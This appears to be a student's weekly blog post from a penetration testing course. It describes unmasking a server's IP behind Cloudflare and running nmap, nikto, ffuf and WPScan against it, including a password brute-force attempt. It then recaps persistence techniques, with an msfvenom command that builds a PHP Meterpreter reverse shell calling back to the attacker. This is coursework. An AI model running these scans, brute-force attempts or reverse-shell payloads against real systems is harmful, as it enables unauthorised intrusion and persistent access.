Week 11

This week, our team made initial progress in the final penetration testing project by successfully uncovering the real IP address of the target server, server1.pentest.id, which was originally hidden behind Cloudflare.

 Real IP Discovery

  • Identified IP: 103.127.137.243

  • Method: We used Censys, a search engine for internet-connected assets. By digging through historical DNS records and SSL/TLS certificate data, we were able to trace the origin IP — a reminder that even reverse proxies like Cloudflare can be bypassed with the right tools and research.

Scanning & Enumeration Tools

Once we had the real IP, we began actively scanning the server to find potential vulnerabilities:

1. Nmap

Used for port and service discovery:

nmap -sV -Pn 103.127.137.243

This scan revealed multiple open services (e.g., web, FTP, SSH) that could be potential entry points.

2. Nikto

Scanned the web server for outdated software and known issues:

nikto -h http://103.127.137.243

3. FFUF (Fuzz Faster U Fool)

Performed directory brute-forcing to uncover hidden paths:

ffuf -u http://103.127.137.243/FUZZ -w /usr/share/wordlists/dirb/common.txt

This helped us identify unlisted admin pages and other sensitive endpoints.

4. WPScan

We discovered the server was running WordPress and used WPScan to:

  • Check for vulnerable plugins/themes

  • Enumerate users

  • Attempt brute-force login using rockyou.txt (unsuccessful)

Lecture Recap: Maintaining Access After Exploitation

While we worked on scanning, the lecture focused on persistence techniques — how attackers maintain access after compromising a system.

Backdoor Tools:

  • Cymothoa – Injects shellcode into running processes

  • Meterpreter – A stealthy, post-exploitation tool from Metasploit

  • Weevely & Webacoo – PHP web backdoors disguised as normal files

Web-Based Persistence:

We practiced generating reverse shells with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=[your IP] -f raw > shell.php

Uploading shell.php and opening it in a browser creates a reverse Meterpreter session back to the attacker.

Tunneling Techniques:

Used to evade firewalls and proxies:

  • proxychains

  • ptunnel, socat

  • iodine, dns2tcp (for DNS tunneling)

These methods disguise malicious traffic within trusted protocols like DNS or HTTPS, making it harder to detect.

Comments

Popular posts from this blog

Final Reflection

Week 10

Week 8